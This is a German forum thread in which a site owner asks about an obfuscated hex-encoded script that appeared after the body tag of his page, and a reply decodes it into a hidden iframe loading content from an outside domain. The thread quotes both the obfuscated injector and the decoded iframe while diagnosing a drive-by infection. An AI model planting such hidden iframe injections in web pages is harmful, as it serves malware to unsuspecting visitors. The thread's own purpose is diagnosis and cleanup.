hallo,

es gibt da eine index.php - die sieht so aus:



<script language="javascript">
window.location = "http://www.xyz.de";
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-745870-1";
urchinTracker();

</script>
</head>

<body>
<div align="center">
<table width="779" border="0" cellspacing="0" cellpadding="0">
<tr>


man kann also sehen, dass nach body nichts wildes kommt - ausser normalem code.

wenn ich mir aber den quelltext der webseite selbst anzeigen lasse, sieht der bereich so aus:



<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-745870-1";
urchinTracker();
</script>
</head>

<body><script>function v475bcd6c1445c(v475bcd6c153fe){ function v475bcd6c1639c () {return 16;} return(parseInt(v475bcd6c153fe,v475bcd6c1639c())); }function v475bcd6c182dc(v475bcd6c1927c){ function v475bcd6c1c15c () {return 2;} var v475bcd6c1a21c='';for(v475bcd6c1b1bc=0; v475bcd6c1b1bc<v475bcd6c1927c.length; v475bcd6c1b1bc+=v475bcd6c1c15c()){ v475bcd6c1a21c+=(String.fromCharCode(v475bcd6c1445 c(v475bcd6c1927c.substr(v475bcd6c1b1bc, v475bcd6c1c15c()))));}return v475bcd6c1a21c;} document.write(v475bcd6c182dc('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D653 0207372633D5C27687474703A2F2F6C736B64666A6C65726A7 66D2E636F6D2F61726D332F696E6465782E7068703F272B4D6 174682E726F756E64284D6174682E72616E646F6D28292A323 531333238292B27323939636234613763635C2720776964746 83D363732206865696768743D333734207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F696672616D653E2 7293C2F5343524950543E'));</script>
<div align="center">
<table width="779" border="0" cellspacing="0" cellpadding="0">

<tr>



hier gibt es nach dem body tag auf einmal dieses script - und mir ist völlig unklar, wo das herkommt - und vorallem was das macht.
kann das irgendjemand zuordnen? ein paar besucher der seite haben sich über trojanerwarnungen ihres webschutzes beschwert....

heissen dank für jeden hinweis, Nik

Das ist ein Script das nichts anderes tut als an genau dieser Stelle diesen Code einzufügen (code ein wenig formatiert):

<SCRIPT>
window.status = 'Done';
document.write( '<iframe name=e0 src=\'http://lskdfjlerjvm.com/arm3/index.php?' + Math.round( Math.random() * 251328 ) + '299cb4a7cc\' width=672 height=374 style=\'display: none\'></iframe>' )
</SCRIPT>
Was wiederum wohl diesen Code einfügen soll ;)

<iframe name=e0 src='http://lskdfjlerjvm.com/arm3/index.php?[ZUFALLSZAHL]299cb4a7cc' width=672 height=374 style='display: none'></iframe>

Auf wen auch immer diese Domain läuft...

danke fürs "descrambeln" .o0(wie macht man das...?)

ok, bleibt nurnoch die frage, wie das da hinkommt.laut 1und1 (ist nen managed server) ist ein einbruch völlig unmöglich, nur wenn der php code schlecht wäre - dann könnte man die seite verändern....

noch fragen? ;D

also meine frage wo die zeile nur herkommt, konnte mir nicht beantwortet werden. morgen früh ab 08:00 sind wieder leute da, die sowas rausfinden können.... ich bin gespannt.

greets, Nik

Wenn der PHP-Code dieses Resultat wirklich nicht hergibt, würde ich mir mal den Webserver genauer ansehen. Aber ich würde mich schonmal auf "Plattmachen und Neu-Installieren" einrichten. Das sieht mir nicht nach einem einfachen XSS-Problem aus (welches ja zumindest den Server selbst nicht "tangiert").

mussu mal lesen. 1und1 sagt, dass ist unmöglich ;)

greets, Nik

Hm... Vielleicht wollte 1 & 1 ja keine unqualifizierten Schlüsse ziehen...

Grüsse, Steven

Vielleicht hat der Techniker auch nur das gemacht, was im Handbuch steht: Sagen, dass 1&1 keine Schuld hat :P

das ist auch meine vermutung...

@Steven
dann hätte man dort das "unmöglich" weggelassen.

greets, Nik

Wenn morgen früh ein Post "Hilfe!! Server von Kunden gehackt?!!111einelf" kommt, wissen wir ja warum.

Vielleicht hat der Techniker auch nur das gemacht, was im Handbuch steht: Sagen, dass 1&1 keine Schuld hat :P

Das meinte ich eigentlich... Da habe ich mich wohl unglücklich ausgedrückt...

Grüsse, Steven